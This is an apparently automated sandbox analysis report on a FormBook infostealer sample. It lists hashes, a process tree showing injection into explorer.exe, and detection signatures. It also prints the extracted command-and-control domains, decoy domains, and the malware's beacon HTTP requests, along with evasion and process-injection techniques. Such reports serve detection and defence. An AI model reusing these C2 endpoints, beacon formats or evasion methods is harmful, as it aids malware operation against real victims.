Loading ...

Play interactive tourEdit tour

Windows Analysis Report v8kZUFgdD4.exe

Overview

General Information

Sample Name:v8kZUFgdD4.exe
Analysis ID:452667
MD5:57f3ae2842ffb5ceea386d0b97a52818
SHA1:68423398d025d3cbbb944ee4c3cea5501df67761
SHA256:a0c7b3d44a5cfcda917fc80c099da5ab3de582ff7c24f1373b4bd25f88d61e52
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • v8kZUFgdD4.exe (PID: 724 cmdline: 'C:\Users\user\Desktop\v8kZUFgdD4.exe' MD5: 57F3AE2842FFB5CEEA386D0B97A52818)
    • v8kZUFgdD4.exe (PID: 6148 cmdline: 'C:\Users\user\Desktop\v8kZUFgdD4.exe' MD5: 57F3AE2842FFB5CEEA386D0B97A52818)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 6580 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 6744 cmdline: /c del 'C:\Users\user\Desktop\v8kZUFgdD4.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166c9:$sqlite3step: 68 34 1C 7B E1
        • 0x167dc:$sqlite3step: 68 34 1C 7B E1
        • 0x166f8:$sqlite3text: 68 38 2A 90 C5
        • 0x1681d:$sqlite3text: 68 38 2A 90 C5
        • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
        0.2.v8kZUFgdD4.exe.21d0000.2.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.v8kZUFgdD4.exe.21d0000.2.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 8 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.findfoodshop.com/dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&0X=C6Ah3vPxAvira URL Cloud: Label: malware
          Source: http://www.invisiongc.net/dy8g/?i0GDM=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A==&0X=C6Ah3vPxAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: v8kZUFgdD4.exeVirustotal: Detection: 38%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: 7.2.ipconfig.exe.3ac7960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.v8kZUFgdD4.exe.2190000.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 7.2.ipconfig.exe.11406b0.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.v8kZUFgdD4.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.v8kZUFgdD4.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: v8kZUFgdD4.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
          Source: Binary string: ipconfig.pdb source: v8kZUFgdD4.exe, 00000001.00000002.389856707.0000000000A20000.00000040.00000001.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: v8kZUFgdD4.exe, 00000001.00000002.389856707.0000000000A20000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.363215324.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: v8kZUFgdD4.exe, 00000000.00000003.338578386.0000000002500000.00000004.00000001.sdmp, v8kZUFgdD4.exe, 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, ipconfig.exe, 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: v8kZUFgdD4.exe, ipconfig.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.363215324.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 52.58.78.16:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 52.58.78.16:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 52.58.78.16:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49762 -> 103.138.88.11:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49762 -> 103.138.88.11:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49762 -> 103.138.88.11:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49763 -> 162.241.62.54:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49763 -> 162.241.62.54:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49763 -> 162.241.62.54:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.extinctionbrews.com/dy8g/
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&0X=C6Ah3vPx HTTP/1.1Host: www.extinctionbrews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&0X=C6Ah3vPx HTTP/1.1Host: www.doityourselfism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=X9Az7RthaT8xdqkxQ6tJRjQeFUHqBPh6fb7YU5dnwYv1rghxnAYW3P4f0krKlocv9Wl7uwWiww==&0X=C6Ah3vPx HTTP/1.1Host: www.ecofingers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A==&0X=C6Ah3vPx HTTP/1.1Host: www.invisiongc.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&0X=C6Ah3vPx HTTP/1.1Host: www.findfoodshop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3+VBHaRIBYykQk9iPNEqtroWJ/WwLhcg==&0X=C6Ah3vPx HTTP/1.1Host: www.scuolatua.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=uor47PkOoKkLY099HuArMxw1XFE/ncsTlzCE/ODY21NzZk1xVsb5QvrTgLDn7S7AYBCRuXEk2w==&0X=C6Ah3vPx HTTP/1.1Host: www.okinawarongnho.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImUVNZCFSYJzAIvZikA==&0X=C6Ah3vPx HTTP/1.1Host: www.jorgeporcayo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.58.78.16 52.58.78.16
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&0X=C6Ah3vPx HTTP/1.1Host: www.extinctionbrews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&0X=C6Ah3vPx HTTP/1.1Host: www.doityourselfism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=X9Az7RthaT8xdqkxQ6tJRjQeFUHqBPh6fb7YU5dnwYv1rghxnAYW3P4f0krKlocv9Wl7uwWiww==&0X=C6Ah3vPx HTTP/1.1Host: www.ecofingers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A==&0X=C6Ah3vPx HTTP/1.1Host: www.invisiongc.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&0X=C6Ah3vPx HTTP/1.1Host: www.findfoodshop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3+VBHaRIBYykQk9iPNEqtroWJ/WwLhcg==&0X=C6Ah3vPx HTTP/1.1Host: www.scuolatua.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=uor47PkOoKkLY099HuArMxw1XFE/ncsTlzCE/ODY21NzZk1xVsb5QvrTgLDn7S7AYBCRuXEk2w==&0X=C6Ah3vPx HTTP/1.1Host: www.okinawarongnho.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i0GDM=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImUVNZCFSYJzAIvZikA==&0X=C6Ah3vPx HTTP/1.1Host: www.jorgeporcayo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.aizaibali.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Thu, 22 Jul 2021 15:44:03 GMTConnection: closeContent-Length: 5045Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.343561590.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
